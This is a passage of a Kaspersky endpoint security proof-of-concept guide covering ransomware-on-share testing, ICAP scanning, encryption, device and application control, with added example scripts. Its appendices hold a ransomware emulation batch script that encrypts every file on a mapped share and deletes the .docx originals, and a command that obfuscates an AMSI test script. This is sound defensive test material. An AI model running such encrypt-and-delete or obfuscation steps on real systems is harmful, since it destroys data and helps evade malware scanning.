1. Create a network shared folder with write permissions for everyone on the protected server and fill it with some data (documents).
2. Map the network share as a network drive on the attacker computer.
3. Encrypt files in the share from the remote host.
4. Enable the Anti-Cryptor and Untrusted Host Blocking features on the protected server.
5. Try to encrypt files in the network share.
6. Check the results.

Expected results:

The encryption of the files in the network share is detected by KSWS and the access to the share is blocked for the remote host.

Instructions:

1. Create a shared folder on the protected server.
2. Fill the folder with some content and create backup copies of the content.
3. Connect the shared folder to the client computer as a network drive (e.g. Z:).
4. Run the encryption script on the client computer (see the Appendix for the script file).
5. Notice that the files in the shared folder were encrypted with the AESCrypt utility.
6. Restore the encrypted files from the backup.
7. Open the policy properties and switch to the Server Control section.
8. In the Anti-Cryptor settings specify the shared folder in the protection scope.
9. Enable the Anti-Cryptor task.
10. Open the Untrusted host blocking settings.
11. Enable Untrusted host blocking.
12. Run the encryption script. Notice the error message in the console.
13. Check the events in KSC. Encryption activity was detected.
14. And the malicious host was added to the untrusted hosts list.

Congratulations! You have successfully protected network shared folders on the server from ransomware. Untrusted hosts were blocked for the specified time.

KSWS integration with 3rd party system (ICAP)

This scenario shows how KSWS can be integrated with a proxy server, Squid in this case. The proxy server will send objects for scanning to KSWS via ICAP. Depending on the KSWS verdict, the proxy server will allow or block access to the object.

For this feature to be available you have to have a Kaspersky Security for storages license.

Evaluation steps:

1. Configure KSWS to accept requests via ICAP
2. Configure the Squid proxy server to send objects for scanning to KSWS
3. Try to download the EICAR test file from the Internet.

Expected results:

The download of the EICAR test virus file is blocked.

Instructions:

1. Open the KSWS policy properties. Go to the Network Attached Storage Protection section and open the ICAP-Network Storage Protection settings.
2. Check the settings. The default settings are enough for this demonstration. Change the settings if necessary.
3. Switch to the Task management tab and enable the task.
4. Add the following lines to the squid.conf file:

icap_enable on
icap_service service_resp respmod_precache bypass=0 icap://[KSWS IP Address]:1344/avscan
adaptation_access service_resp allow all

   Restart the Squid proxy server.
5. Navigate to this link in a web browser that is configured to use the Squid proxy server:
   http://www.eicar.org/download/eicar.com
   You should get the following warning from KSWS (see screenshot).
6. Check the event in the KSC console.

The download of the EICAR test-virus file has been blocked by KSWS.
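What the squid.conf lines above set in motion is an ICAP RESPMOD exchange: Squid wraps the HTTP response it fetched into an ICAP request, sends it to the scanner on port 1344, and acts on the reply. The code below is an added example, not code from the Kaspersky guide, from Squid or from KSWS; it builds that request the way a proxy does, parses the scanner's reply and maps it to an allow/block decision so the exchange can be studied offline. It assumes 192.0.2.10 as a stand-in for [KSWS IP Address], uses constructed HTTP messages and ICAP replies as test data, and treats X-Virus-ID as the detection header that common ICAP scanners send (the guide does not say which header KSWS uses).

```python
"""ICAP RESPMOD exchange between a proxy and an ICAP scanner (RFC 3507).

Added example, not code from the Kaspersky guide, Squid or KSWS: the
squid.conf lines above make Squid hand every HTTP response to
icap://[KSWS IP Address]:1344/avscan with a RESPMOD request. This module
builds that request the way a proxy does, parses the scanner's reply and maps
it to an allow/block decision, so the exchange can be studied offline.
Assumptions: 192.0.2.10 stands in for [KSWS IP Address]; the HTTP messages
and ICAP replies are constructed test data; X-Virus-ID is the header common
ICAP scanners use to name a detection, the guide does not say what KSWS sends.
"""
import socket

ICAP_HOST = "192.0.2.10"  # placeholder for [KSWS IP Address] from the guide
ICAP_PORT = 1344          # port from the guide's squid.conf line
ICAP_SERVICE = "avscan"   # service path from the guide's squid.conf line


def build_respmod(http_request: bytes, http_response: bytes,
                  host: str = ICAP_HOST, port: int = ICAP_PORT,
                  service: str = ICAP_SERVICE) -> bytes:
    """Encapsulate an HTTP request/response pair in an ICAP RESPMOD request."""
    req_hdr = http_request.partition(b"\r\n\r\n")[0] + b"\r\n\r\n"
    res_hdr, _, body = http_response.partition(b"\r\n\r\n")
    res_hdr += b"\r\n\r\n"
    # Encapsulated lists the byte offset of each section within the ICAP body.
    encapsulated = (f"req-hdr=0, res-hdr={len(req_hdr)}, "
                    f"res-body={len(req_hdr) + len(res_hdr)}")
    icap_hdr = (f"RESPMOD icap://{host}:{port}/{service} ICAP/1.0\r\n"
                f"Host: {host}\r\n"
                "Allow: 204\r\n"          # the scanner may answer 204 for a clean object
                "Connection: close\r\n"   # lets a simple client read until EOF
                f"Encapsulated: {encapsulated}\r\n\r\n").encode("ascii")
    # The response body is sent HTTP-chunked and terminated by a zero-length chunk.
    chunked = f"{len(body):x}\r\n".encode("ascii") + body + b"\r\n0\r\n\r\n"
    return icap_hdr + req_hdr + res_hdr + chunked


def parse_icap_response(raw: bytes) -> dict:
    """Split an ICAP reply into status, reason, headers and encapsulated payload."""
    head, _, payload = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("ICAP/"):
        raise ValueError(f"not an ICAP status line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": int(parts[1]),
            "reason": parts[2] if len(parts) == 3 else "",
            "headers": headers,
            "payload": payload}


def decide(response: dict) -> tuple:
    """Map the scanner's reply to the proxy's action as (action, detail)."""
    status = response["status"]
    if status == 204:
        return ("allow", "object returned unmodified")
    if status == 200:
        # The scanner replaced the HTTP response, typically with a block page.
        return ("block", response["headers"].get("x-virus-id", "unspecified threat"))
    # With bypass=0 in squid.conf a failed scan is an error for the client, not a pass.
    return ("error", f"ICAP status {status} {response['reason']}")


def scan_over_network(http_request: bytes, http_response: bytes,
                      host: str = ICAP_HOST, port: int = ICAP_PORT) -> dict:
    """Send the RESPMOD request to a live ICAP server and parse its reply."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_respmod(http_request, http_response, host, port))
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return parse_icap_response(b"".join(chunks))


# Constructed messages: the GET a browser sends for the guide's test download,
# a small HTTP response with a harmless body, and two possible scanner replies.
SAMPLE_HTTP_REQUEST = (b"GET http://www.eicar.org/download/eicar.com HTTP/1.1\r\n"
                       b"Host: www.eicar.org\r\n\r\n")
SAMPLE_HTTP_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                        b"not a real test file")
SAMPLE_CLEAN_REPLY = b"ICAP/1.0 204 No Content\r\nISTag: \"example\"\r\n\r\n"
SAMPLE_BLOCK_REPLY = (b"ICAP/1.0 200 OK\r\nISTag: \"example\"\r\n"
                      b"X-Virus-ID: EICAR-Test-File\r\n"
                      b"Encapsulated: res-hdr=0, res-body=45\r\n\r\n"
                      b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n0\r\n\r\n")

if __name__ == "__main__":
    for reply in (SAMPLE_CLEAN_REPLY, SAMPLE_BLOCK_REPLY):
        print(decide(parse_icap_response(reply)))
```

scan_over_network is the only function that touches the network; pointing it at the KSWS host with the EICAR response captured from the proxy reproduces step 5 without a browser, and the parsed reply is the same data Squid evaluates when it decides whether to serve the object or the KSWS warning.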

Linux server protection

Evaluation steps:

1. Download the EICAR test file from the Internet
2. Check the event log

Expected results:

The EICAR test virus file will be deleted right after downloading by Real-time protection.

Instructions:

1. Download the EICAR test virus using the following command:
   wget -P ~/ http://www.eicar.org/download/eicar.com
2. Check the events in KSC

Data protection for Desktops (KES)


Full Disk Encryption

The Full Disk Encryption feature protects data from being accessed by unauthorized persons in case a laptop or a hard drive is stolen. This scenario shows how to configure full drive encryption with the Kaspersky Disk Encryption technology in KES 11.

Evaluation steps:

1. Configure and apply the encryption policy.
2. Wait until the encryption process starts.

Expected results:

A hard drive is encrypted.

Instructions:

1. Open the KES 11 policy properties in KSC and switch to the Full Disk Encryption section. Select Kaspersky Disk Encryption as the encryption technology and change the encryption mode to Encrypt all hard drives. Save and apply the policy.
2. In the KSC console add an additional column to be able to see the encryption status. Click the Add/Remove columns link.
3. Tick the Encryption status checkbox and close the window by clicking OK.
4. Double-click the device that falls under the policy. Switch to the Events section. Note that the computer requires a restart after the policy has been applied.
5. You can see it in the Encryption status column as well.
6. Restart the target computer. During the system restart the Authentication Agent will run in test mode in order to ensure hardware compatibility.
7. After the reboot is completed, the Encryption status of the computer will change to Applying policy. This means that the encryption process has started.
8. To see more details on the encryption process, double-click the device to open its properties. Switch to the Applications section. Select the Kaspersky Endpoint Security for Windows application and click the Statistics button.
9. Scroll down to check the encryption status.
10. The encryption process runs in the background and is fully transparent to the user. It is not necessary to wait until the drive is 100% encrypted. If the user performs a system reboot, he will see the Authentication Agent before the OS boots.

Congratulations! You have encrypted the hard drives with the Kaspersky encryption technology.

USB File Level Encryption with portable file manager

Kaspersky Endpoint Security allows you to secure sensitive data with file level encryption technology when the data is transferred on removable drives. This scenario shows how to configure USB File Level Encryption with the portable file manager in order to ensure that sensitive data on the removable drive can be accessed only by an authorized person.

Evaluation steps:

1. Configure and apply the encryption policy.
2. Copy an example file to a removable drive.
3. Connect the removable drive to another computer and try to access the data.
4. Run the portable file manager and access the encrypted data.

Expected results:

Data can be accessed only with authorization via the portable file manager.

Instructions:

1. Open the KES 11 policy properties and switch to the Encryption of removable drives section. Set the Encryption mode to Encrypt new files only and enable Portable mode. Save and apply the policy.
2. After the policy is applied, when a user connects a USB drive to the computer he sees the following dialog. If he chooses the Do not encrypt files option, the drive will be available only for reading. To be able to write to the disk, a user has to select the Encrypt files option.
3. After that the user will be asked to create a password for the portable file manager.
4. When the password is set, it is allowed to write to the USB drive.
5. Create a text file (New file.txt in this example) and copy it to the USB drive. The file will be encrypted right after it is copied to the drive. Connect the USB drive to a computer without KES and try to open the newly encrypted file. You will see that the file is encrypted and its content is unreadable.
6. Now launch the portable file manager (pmv.exe) and enter the password.
7. With the portable file manager you will access the file.

You have configured the encryption policy to encrypt only files that are added to a USB drive after the policy is applied. The files can be accessed with the portable file manager.

BitLocker management

KES 11 offers the BitLocker management capability in order to provide more flexible tools for drive encryption. This
scenario shows how to configure full drive encryption feature using BitLocker Drive Encryption technology.

Evaluation steps:

1. Configure and apply the encryption policy.
2. Wait until the encryption process completes.

Expected results:

A hard drive is encrypted with BitLocker Drive Encryption technology.

Instructions:

1. Open the KES 11 policy properties in KSC and switch to the Full Disk Encryption section. Select BitLocker Drive Encryption as the encryption technology and change the encryption mode to Encrypt all hard drives. Save and apply the policy.
2. Right after the policy is applied, the user will be asked to set a password.
3. The drive encryption will start after the system reboot.
4. During the system reboot the user will be asked for the password in the BitLocker pre-boot authentication.
5. When the system has rebooted, you can check the encryption status in the computer's properties. To do that, double-click the device to open its properties. Switch to the Applications section. Select the Kaspersky Endpoint Security for Windows application and click the Statistics button.
6. Scroll down to check the encryption status.
7. The encryption process runs in the background and is fully transparent to the user.

Congratulations! You have encrypted the hard drives with BitLocker Drive Encryption technology.

Desktop controls
Web control

Many companies are concerned about Internet traffic consumption. When analyzing the company's Internet traffic, security administrators may want to prevent users from visiting social networks.

This is possible with the Web Control feature available in KES 11. In this evaluation scenario, we will configure blocking of access to social networks for all users.

Evaluation steps:

1. Configure and apply the policy
2. Access a restricted web resource from the user's computer.

Expected results:

The access to the specified site is restricted.

Instructions:

1. Open the KES 11 policy properties and switch to the Web Control section. Click the Add button to add a new rule.
2. Specify the rule parameters.
   Name: Social Networks
   Filter content: By content categories
   Content category: Internet communication media
   Users and groups: Everyone
   Action: Block
   Save the rule and apply the policy.
3. Try to access vk.com or facebook.com from a protected machine. You will get the Access Denied banner.

Congratulations! You have configured the Web Control feature to block the access to social networks.

Device control

This scenario shows the capability of the Device Control component and how to deny the use of unwanted removable drives.

Evaluation steps:

1. Configure the policy to restrict USB device connections.
2. Connect a USB drive to a protected system.
3. Review the event log.

Expected results:

The use of the USB drive is blocked by Device Control.

Instructions:

1. Open the KES 11 policy properties and switch to the Device Control section.
2. In the Device Control Settings area select Removable drives from the list. Change the Access value to Block.
3. Try to connect a USB drive to a protected system. The use of the removable drive will be blocked and you will see the following notification.
4. Review the event in KSC.
5. Details.

You have configured the Device Control feature to block the use of unwanted removable drives.

Application startup control

This scenario demonstrate how Application startup control can blocks the launch of untrusted programs. In this
scenario you will configure default deny policy with minimum set of applications allowed to start. Then you will add
the Internet browsers to the whitelist.

Evaluation steps:

Endpoint Security Proof of Concept Guide Page 67 of 78


Kaspersky Enterprise Cybersecurity

1. Configure policy to enable default deny (whitelisting).


2. Check if the startup of the application that is not in the list (internet explorer) is blocked.
3. Create a category for allowed applications.
4. Add application category to the whitelist.
5. Check if the application startup is blocked.

Expected results:

The launch of an application that is not in the whitelist is blocked. After the application is added to the whitelist, its launch is allowed.

Instructions:

1. Open the KES 11 policy and switch to the Application control section. Change the Application Control mode to White list. Ensure that the Golden Image rule status is On. Save and apply the policy.

2. Try to launch the Chrome web browser on a protected computer. You will get the following error…

3. … and the following notification from KES 11.

4. In the KSC, expand the Advanced section, then the Application Management section, and open the Application categories section. Click the Create a category… button.

5. Select the first type of category (Category with content added manually).

6. Define the name of the category.

7. Click the Add button and select the KL category option from the menu.

8. Select the Browsers group and close the dialog windows by clicking OK.

9. You have now added a condition that includes applications in the category. Proceed to the next step.

10. Here you can add conditions that exclude applications from the category, if necessary. Proceed to the next step.

11. Finish the category creation wizard.

12. Click the Add button to add the just-created category to the whitelist.

13. Select your category from the drop-down list. In this case the category is Browsers. Leave the other settings at their defaults and proceed to the next step.

14. Now you can close the policy properties window and start the Internet browsers on the protected devices.

Congratulations! You have configured an Application Startup Control Default Deny policy and added additional applications (the Internet browsers) to the whitelist.
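A check for the Default Deny result, added here as an example and not part of the Kaspersky guide: run it on the protected computer to confirm which launches are blocked before and after the Browsers category is whitelisted. It assumes a launch denied by Application Control surfaces as an exception from Start-Process; the executable paths and the Test-LaunchPolicy name are constructed for this example.

```powershell
# Added example, not from the guide: verify which launches the Default Deny policy
# blocks on the protected computer. Assumption: a launch denied by Application
# Control surfaces as an exception from Start-Process (access denied).

function Test-LaunchPolicy {
    param(
        # Each case: the executable to start and whether the policy should allow it
        [Parameter(Mandatory)] [hashtable[]] $Cases
    )
    foreach ($case in $Cases) {
        $launched = $false
        $detail   = ''
        try {
            $proc = Start-Process -FilePath $case.Path -PassThru -ErrorAction Stop
            $launched = $true
            # The test only asks whether the launch was permitted; close what we started
            Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
        }
        catch {
            $detail = $_.Exception.Message
        }
        $expected = if ($case.Allowed) { 'allowed' } else { 'blocked' }
        $actual   = if ($launched)     { 'allowed' } else { 'blocked' }
        [pscustomobject]@{
            Path     = $case.Path
            Expected = $expected
            Actual   = $actual
            Pass     = ($expected -eq $actual)
            Detail   = $detail
        }
    }
}

# Constructed cases for this PoC (paths are hypothetical): Notepad is part of the
# golden image and stays allowed; Chrome is blocked until the Browsers category
# is added to the whitelist, so flip its Allowed flag to $true after step 14.
$cases = @(
    @{ Path = "$env:SystemRoot\System32\notepad.exe";                  Allowed = $true  },
    @{ Path = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; Allowed = $false }
)
Test-LaunchPolicy -Cases $cases | Format-Table -AutoSize
```

Any row with Pass = False means the policy does not match the expectation for that executable, which is the point to check against the KES notification shown in step 3.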


Conclusion
This concludes your evaluation of Endpoint Security. This simplified guide is intended for a quick evaluation of
the product features, using a narrow scope of work. It does not replace the Product Documentation and the detailed
Deployment Guides (see the Further reading section). Through this process, you have learned how to install the Endpoint
Security products and demonstrate their most interesting features.


Appendix A: POC success criteria

#     | Task                                             | Success criteria                                                                          | Notes
1     | Prepare environment                              |                                                                                           |
1.1   | Review the requirements                          | POC environment meets all the imposed requirements                                        |
1.2   | Configure network                                | All required network ports are open in the right direction                                |
1.3   | Check accounts rights and permissions            | POC is performed through accounts having sufficient privileges                            |
2     | Setup and deploy                                 |                                                                                           |
2.1   | Install Kaspersky Security Center 10             | Kaspersky Security Center Administration server and administration console are installed  |
2.1.1 | Install Network Agent for Windows                | Network Agents are installed on the target devices                                        |
2.1.2 | Install Network Agent for Linux                  | Network Agents are installed on the target devices                                        |
2.2   | Install Kaspersky Endpoint Security 11 for Windows | KES 11 for Windows is installed on the target devices                                   |
2.3   | Install Kaspersky Endpoint Security 10 for Linux | KES 10 for Linux is installed on the target devices                                       |
2.4   | Install Kaspersky Security 10 for Windows        | KSWS 10 is installed on the target devices                                                |
3     | Antimalware protection for Windows workstations  |                                                                                           |
3.1   | Malware advanced detection (AMSI)                | PowerShell script execution is prevented                                                  |
3.2   | Exploit prevention testing                       | Vulnerability exploitation is prevented                                                   |
3.3   | Web threats protection                           | Malicious URL is detected. Web access to the malicious URL is blocked                     |
3.4   | Anti-Bridging testing                            | The use of an alternative network interface is denied                                     |
3.5   | Network Threats Protection                       | Network port scanning is detected                                                         |
4     | Antimalware protection for servers               |                                                                                           |
4.1   | Anti-ransomware testing                          | Ransomware attack on a network share is prevented                                         |
4.2   | KSWS ICAP integration with proxy server          | EICAR test virus file download is blocked                                                 |
4.3   | Linux servers protection                         | EICAR test virus file is detected                                                         |
5     | Data protection for workstations and laptops     |                                                                                           |
5.1   | Full Drive Encryption                            | A hard drive is encrypted with Kaspersky encryption technology                            |
5.2   | USB File Level Encryption with portable mode     | Files on a USB flash drive are encrypted and can be accessed only with the portable file manager |
5.3   | BitLocker management                             | A hard drive is encrypted with BitLocker technology                                       |
6     | Workstation controls                             |                                                                                           |
6.1   | Web control                                      | Access to the specified web resources is denied                                           |
6.2   | Device control                                   | The use of removable drives is denied                                                     |
6.3   | Application startup control                      | Default Deny policy is applied; an application added to the whitelist can be launched     |


Appendix B: Further Reading


Kaspersky Security Center 10

Support web site: https://support.kaspersky.com/ksc10

Administrator guide: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_admguideen.pdf

Best practices: https://docs.s.kaspersky-labs.com/english/kasp10_best_practicesen.pdf

Getting started: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_gsen.pdf

Implementation guide: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_implguideen.pdf

KSC 10 SP3 What’s new: https://box.kaspersky.com/d/4a212ceb6073480aa124/files/?p=/KSC_10_SP3_Whats_new.pdf

Kaspersky Endpoint Security 11 (beta)

KES11 what’s new: https://box.kaspersky.com/d/4a212ceb6073480aa124/

Online help: https://help.kaspersky.com/KESWin/11/en-US/127968.htm

Kaspersky Security 10 for Windows Servers

Support web site: https://support.kaspersky.com/ksws10

Administrator guide: https://docs.s.kaspersky-labs.com/english/ks4ws_admin_guide_en.pdf

Installation guide: https://docs.s.kaspersky-labs.com/english/ks4ws_install_guide_en.pdf

Kaspersky Endpoint Security 10 for Linux

Support web site: https://support.kaspersky.com/kes10linux

Administrator guide: https://docs.s.kaspersky-labs.com/english/kes10_linux_adminguide_en.pdf


Appendix C: Ransomware emulation script

@echo off
rem Step 0: the emulation relies on the AES Crypt command-line tool being present
if exist C:\AESCrypt\aescrypt.exe goto :Step1
echo **** not exist C:\AESCrypt\aescrypt.exe ****
pause
exit

:Step1
rem The test share \\ksc.testlab.local\share must be mapped as drive Z:
if exist Z:\ goto :Step2
echo **** not exist \\ksc.testlab.local\share ****
pause
exit

:Step2
rem Encrypt every file on the share; KSWS Anti-Cryptor is expected to block this
C:\AESCrypt\aescrypt.exe -e -p root Z:\*.*
if exist Z:\EULA.txt.aes goto :Step3
rem No encrypted file appeared, so the encryption was prevented (or never ran)
echo **** Files were not encrypted ****
pause
exit

:Step3
rem Emulate the final ransomware action: remove the plaintext originals
del Z:\*.docx
echo **** Congratulations!!! Files are encrypted ****
pause
exit


Appendix D: AMSI demonstration scripts

bsstest_amsi.ps1:
Get-Host | Select-Object Version | Write-Host
Try
{
# Check that Invoke-Expression works normally
$text = iex 'return "#KLBssBlockMeAmsi#"'
# Check that Invoke-Expression content is delivered to the bases (via BssTest rules)
iex "#KLBssTestDynamicScriptAmsi#"
}
Catch
{
# First invoke failed?
# Log the exception
Write-Host $_
# Return error code
Write-Host "Test failed"
exit 1
}

Try
{
# This should be blocked by the bases (receiving part)
iex "#KLBssBlockMeBasesAmsi#"
Write-Host "Test failed"
exit 2
}
Catch
{
# Log the exception
Write-Host $_
}

Try
{
# This should be blocked by the bases (KDB scan)
iex "#KLBssBlockMeBasesKdbAmsi#"
Write-Host "Test failed"
exit 3
}
Catch
{
# Log the exception
Write-Host $_
}

# Test succeeded - return special code
Write-Host "Test succeeded"
exit 5555

obfuscate_bsstest_amsi:
Import-Module ./Invoke-Obfuscation.psd1
Out-ObfuscatedStringCommand -Path bsstest_amsi.ps1 -ObfuscationLevel 3 > bsstest_amsi_obf.ps1
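Before running bsstest_amsi.ps1, a practitioner usually wants to confirm that an AMSI provider is actually registered on the endpoint, so that a "Test failed" result is attributed to scanning rather than to a missing provider. The following is an added example, not one of the guide's scripts; it assumes the standard registry layout under HKLM\SOFTWARE\Microsoft\AMSI\Providers and that an AMSI block surfaces as an exception whose message mentions malicious content. Get-AmsiProvider and Test-AmsiBlock are names chosen here.

```powershell
# Added example (not from the guide): list registered AMSI providers and run a
# benign control snippet next to the guide's Kaspersky marker string.
# Assumption: providers register a CLSID under HKLM\SOFTWARE\Microsoft\AMSI\Providers,
# whose DLL is resolved through HKLM\SOFTWARE\Classes\CLSID\{CLSID}\InprocServer32.

function Get-AmsiProvider {
    $providerKey = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path $providerKey)) { return @() }
    Get-ChildItem $providerKey | ForEach-Object {
        $clsid  = $_.PSChildName
        $clsKey = "HKLM:\SOFTWARE\Classes\CLSID\$clsid"
        $name = (Get-ItemProperty -Path $clsKey -ErrorAction SilentlyContinue).'(default)'
        $dll  = (Get-ItemProperty -Path "$clsKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
        $dllPath = if ($dll) { $dll.Trim('"') } else { $null }
        [pscustomobject]@{
            Clsid      = $clsid
            Name       = $name
            Dll        = $dllPath
            DllPresent = [bool]($dllPath -and (Test-Path $dllPath))
        }
    }
}

function Test-AmsiBlock {
    param([Parameter(Mandatory)] [string] $Snippet)
    try {
        Invoke-Expression $Snippet | Out-Null
        return $false                     # ran to completion: not blocked
    }
    catch {
        # Assumption: an AMSI block reports "malicious content"; any other error is
        # a script problem, not a detection, so it is re-thrown rather than counted
        if ($_.Exception.Message -match 'malicious') { return $true }
        throw
    }
}

$providers = Get-AmsiProvider
if (-not $providers) { Write-Warning 'No AMSI provider is registered; bsstest_amsi.ps1 cannot pass.' }
$providers | Format-Table -AutoSize

# The control is a harmless string; the marker is the same one bsstest_amsi.ps1 uses.
# Expected on a protected endpoint: ControlBlocked False, MarkerBlocked True.
[pscustomobject]@{
    ControlBlocked = Test-AmsiBlock -Snippet '"hello"'
    MarkerBlocked  = Test-AmsiBlock -Snippet '#KLBssBlockMeBasesAmsi#'
}
```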
